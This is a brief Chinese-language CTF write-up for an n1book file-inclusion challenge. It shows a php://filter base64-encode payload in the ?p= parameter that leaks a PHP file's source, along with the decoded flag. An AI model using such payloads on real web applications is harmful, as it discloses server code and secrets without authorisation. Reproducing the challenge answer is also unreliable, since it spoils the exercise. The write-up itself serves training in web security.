进入环境后,看到url栏里,?p=hello,然后页面回显的是hello world
猜测应当是存在文件包含,而且是存在get传参,后面自动加.php后缀。
尝试?p=flag,回显:no no no
还是用之前学到的知识点php伪协议
构造payload:
?p=php://filter/read/convert.base64-encode/resource=flag
(注意:不加.php)
回显了一串base64编码:
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
解码得到:
<?php
die('no no no');
//n1book{afr_1_solved}
得到flag:
n1book{afr_1_solved}